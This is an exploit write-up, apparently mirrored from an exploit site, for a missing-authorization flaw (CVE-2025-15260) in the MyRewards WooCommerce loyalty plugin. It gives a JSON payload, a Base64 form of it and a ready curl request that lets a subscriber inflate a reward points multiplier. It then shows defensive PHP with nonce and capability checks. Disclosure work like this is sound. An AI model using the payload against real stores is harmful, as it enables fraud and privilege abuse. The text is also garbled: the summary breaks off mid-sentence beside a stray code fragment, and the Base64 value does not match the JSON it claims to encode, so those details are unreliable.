## https://sploitus.com/exploit?id=136807E3-F06F-5289-AE22-B1CBE28B8FEE
# CVE-2025-15260: Missing Authorization / Broken Access Control in Plugin - MyRewards – Loyalty Points and Rewards for WooCommerce
> **Disclaimer:** This repository is created for **educational purposes and ethical disclosure only**. The vulnerability has been responsibly reported to the vendor and patched. Do not use this information to exploit systems without proper authorization.
## Summary
A Critical Broken Access Control / Privilege Escalation vulnerability was discovered in the **MyRewards (WooRewards)** plugin for WooCommerce (versions

```php
m_Source->write($data);
```
## Business Impact
* **Financial Loss:** By manipulating the "Order Amount" points multiplier, bad actors can generate effectively unlimited reward points and exchange them for high-value discount coupons or free items, bypassing the e-commerce payment gateway.
* **Privilege Escalation:** A standard customer (Subscriber) can perform plugin administration actions.
* **Data Integrity Compromise:** Attackers can deface, alter, or delete existing legitimate reward rules, disrupting the store's marketing logic.
## Proof of Concept (PoC)
The following steps demonstrate how an authenticated Subscriber can exploit this flaw.
### 1. Prerequisites
* Target running WooCommerce with MyRewards v5.6.0.
* Valid credentials for a `subscriber` level account.
* A pre-configured reward system (e.g., "Spend money" earning rule). *Note: The ID of this rule (e.g., `101`) is sequential and easily enumerable by observing AJAX post responses.*
### 2. Payload
We want to update the points multiplier of Rule ID `101` to `999,999,999,999,999`.
**Initial JSON**
```json
{
"post_id":"101",
"wre_type":"lws_woorewards_events_orderamount",
"lws_woorewards_events_orderamount_multiplier": "999999999999999"
}
```
**Base64-encoded (value of the `line` parameter)**
```text
eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0
```
### 3. Execute the Attack
Run the following `curl` request as a low-privileged user:
```bash
curl -i -X POST 'http://TARGET_SITE/wp-admin/admin-ajax.php' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-b '[Subscriber_Cookies_Here]' \
-d 'action=lws_adminpanel_editlist&method=put&id=EventList&line=eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0'
```
### 4. Verification
* **Attacker's view:** The server will return `{"status":1}` confirming the update.
* **Administrator's view:** If an Admin visits the Loyalty Settings, they will see the points multiplier for orders has been changed to the astronomical value injected by the attacker.
## Remediation
To fix this issue, update the MyRewards plugin to the latest patched version. The vendor resolved this by:
1. Implementing `current_user_can()` checks within the AJAX controller to verify administrative privileges.
2. Adding `check_ajax_referer()` to validate nonces and prevent Cross-Site Request Forgery (CSRF).
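The following is an added illustration of the two controls listed above, written for this write-up and not taken from the vendor's patch or the plugin's source. It contrasts an unprotected `wp_ajax_` handler with a hardened one. The action name `lws_adminpanel_editlist` and the `line` parameter are the ones seen in the PoC; the function names, the `manage_woocommerce` capability choice, the nonce action `lws_editlist_nonce` and the `update_rule()` persistence helper are assumptions for illustration.

```php
<?php
/**
 * Added example (not the vendor's code): an unprotected WordPress AJAX handler
 * next to a hardened one. The `wp_ajax_{action}` hook fires for EVERY logged-in
 * user, subscribers included, so the hook alone provides no authorization.
 */

// Hypothetical persistence helper standing in for the plugin's own storage logic.
function update_rule( array $line ) {
    // ... write the rule fields to the post identified by $line['post_id'] ...
}

// --- Vulnerable pattern (illustrative) -------------------------------------
// Any authenticated user reaches the write: no nonce, no capability check,
// and the client-supplied post_id and multiplier are trusted as-is.
function vulnerable_editlist_handler() {
    $line = json_decode( base64_decode( wp_unslash( $_POST['line'] ) ), true );
    update_rule( $line );
    wp_send_json( array( 'status' => 1 ) );
}

// --- Hardened pattern ------------------------------------------------------
add_action( 'wp_ajax_lws_adminpanel_editlist', 'secure_editlist_handler' );

function secure_editlist_handler() {
    // 1. Anti-CSRF: verify the nonce sent in the `_ajax_nonce` field. With the
    //    default die=true an invalid or missing nonce ends the request (HTTP 403).
    check_ajax_referer( 'lws_editlist_nonce', '_ajax_nonce' );

    // 2. Authorization: require a capability held only by store managers/admins.
    //    A subscriber fails here regardless of what the payload contains.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges.' ), 403 );
    }

    // 3. Decode and validate the payload only after the checks above pass.
    $raw  = isset( $_POST['line'] ) ? wp_unslash( $_POST['line'] ) : '';
    $json = base64_decode( $raw, true );           // strict: reject non-base64 input
    $line = ( false !== $json ) ? json_decode( $json, true ) : null;

    if ( ! is_array( $line ) || empty( $line['post_id'] ) ) {
        wp_send_json_error( array( 'message' => 'Malformed payload.' ), 400 );
    }

    // 4. Object-level check: the caller must be allowed to edit this specific rule.
    $post_id = absint( $line['post_id'] );
    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Cannot edit this rule.' ), 403 );
    }

    // 5. Bound the multiplier server-side instead of trusting the client value.
    $key        = 'lws_woorewards_events_orderamount_multiplier';
    $multiplier = isset( $line[ $key ] ) ? floatval( $line[ $key ] ) : 0.0;
    if ( $multiplier < 0 || $multiplier > 1000 ) {   // 1000 is an assumed upper bound
        wp_send_json_error( array( 'message' => 'Multiplier out of range.' ), 400 );
    }
    $line[ $key ] = $multiplier;

    update_rule( $line );
    wp_send_json_success( array( 'status' => 1 ) );
}
```

For the nonce check to pass for legitimate admin traffic, the admin page's JavaScript must send a value created with `wp_create_nonce( 'lws_editlist_nonce' )` (typically handed to the script via `wp_localize_script()`). Note that the capability check is what closes the reported issue; the nonce only stops a third-party site from riding an administrator's session, and on its own would not have stopped a logged-in subscriber.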
## Timeline
A short log of the disclosure process to show ethical standards were followed:
* **Date (2025-12-29):** Reported to Wordfence / Developer.
* **Date (2026-02-09):** Vulnerability patched / Public disclosure.
## References & Credits
* [Wordfence Vulnerability Database](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woorewards/myrewards-loyalty-points-and-rewards-for-woocommerce-560-missing-authorization-to-authenticated-subscriber-arbitrary-loyalty-rule-modification)
* [CVE-2025-15260 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-15260)
* [MyRewards Plugin on WordPress.org](https://wordpress.org/plugins/woorewards/)